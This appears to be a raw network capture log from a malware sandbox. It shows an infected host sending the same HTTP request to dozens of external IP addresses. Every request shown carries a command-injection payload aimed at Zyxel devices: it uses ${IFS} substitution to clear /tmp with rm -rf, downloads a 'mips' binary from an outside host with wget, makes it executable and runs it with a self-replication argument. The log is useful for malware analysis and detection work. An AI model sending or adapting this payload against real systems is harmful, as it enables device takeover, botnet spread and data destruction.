                              Mar 31, 2024 08:41:09.564979076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1319192.168.2.1350596150.243.118.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565032005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1320192.168.2.1346868194.57.123.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565090895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1321192.168.2.1339966172.158.185.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565148115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1322192.168.2.134839289.106.149.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565208912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1323192.168.2.1338194169.27.147.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565248013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1324192.168.2.135824841.254.226.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565310955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1325192.168.2.1351518168.71.68.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565339088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1326192.168.2.133856663.158.48.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565390110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1327192.168.2.1356134161.228.135.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565445900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1328192.168.2.1353834184.42.50.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565478086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1329192.168.2.1341782128.180.240.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565541029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1330192.168.2.1355102145.99.178.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565581083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1331192.168.2.1358496193.205.82.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565608025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1332192.168.2.1344132147.61.159.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565653086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1333192.168.2.1355098136.84.202.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565701962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1334192.168.2.1359926189.209.94.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565769911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1335192.168.2.1334734139.197.167.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565815926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1336192.168.2.134202490.201.12.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565880060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1337192.168.2.1343570103.178.151.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565932035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1338192.168.2.135455643.238.218.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.565985918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1339192.168.2.1358410181.146.11.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566040039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1340192.168.2.1335936183.21.182.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566078901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1341192.168.2.135866095.14.131.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566135883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1342192.168.2.1358316103.152.201.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566164970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1343192.168.2.133697670.218.140.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566193104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1344192.168.2.1355922128.107.212.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566246986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1345192.168.2.134895274.82.233.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566302061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1346192.168.2.135308093.155.46.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566356897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1347192.168.2.134796850.245.184.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566411018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1348192.168.2.1341182151.103.161.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566451073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1349192.168.2.133429637.120.198.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566510916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1350192.168.2.135654892.224.200.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566576004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1351192.168.2.13365585.66.19.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566608906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1352192.168.2.13606042.90.141.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566658020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1353192.168.2.1359320108.201.50.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566693068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1354192.168.2.1354802210.154.111.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566739082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1355192.168.2.135455851.124.213.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566790104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1356192.168.2.1352966156.90.111.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566839933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1357192.168.2.135107049.2.29.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566876888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1358192.168.2.13591785.202.87.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566940069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1359192.168.2.134834880.76.249.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.566982985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1360192.168.2.135492498.94.206.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567013979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1361192.168.2.133321019.162.183.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567063093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1362192.168.2.1333356170.96.238.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567106009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1363192.168.2.1358080216.142.209.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567152977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1364192.168.2.135547877.34.78.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567197084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1365192.168.2.1358680161.195.16.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567234993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1366192.168.2.1342508168.96.27.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567290068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1367192.168.2.1348330107.126.79.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567327976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1368192.168.2.1347900104.125.19.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567399979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1369192.168.2.133940296.9.171.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567440033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1370192.168.2.1336950200.192.175.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567487955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1371192.168.2.1351732198.78.79.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567557096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1372192.168.2.135824295.1.22.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567611933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1373192.168.2.1355266118.222.236.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567655087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1374192.168.2.1356980120.134.248.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567706108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1375192.168.2.1355536160.96.39.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567753077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1376192.168.2.1342424125.211.236.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567784071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1377192.168.2.13418462.26.167.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567851067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1378192.168.2.1348804129.165.90.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567909002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1379192.168.2.135482614.155.18.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.567981005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1380192.168.2.1353160150.43.123.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568016052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1381192.168.2.1336792125.176.161.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568070889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1382192.168.2.134372457.233.233.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568111897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1383192.168.2.1355920174.78.229.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568181038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1384192.168.2.133567289.179.130.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568205118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1385192.168.2.1347922176.151.214.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568255901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1386192.168.2.1360714194.243.201.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568317890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1387192.168.2.1346878164.151.110.235443
                              TimestampBytes transferredDirectionData
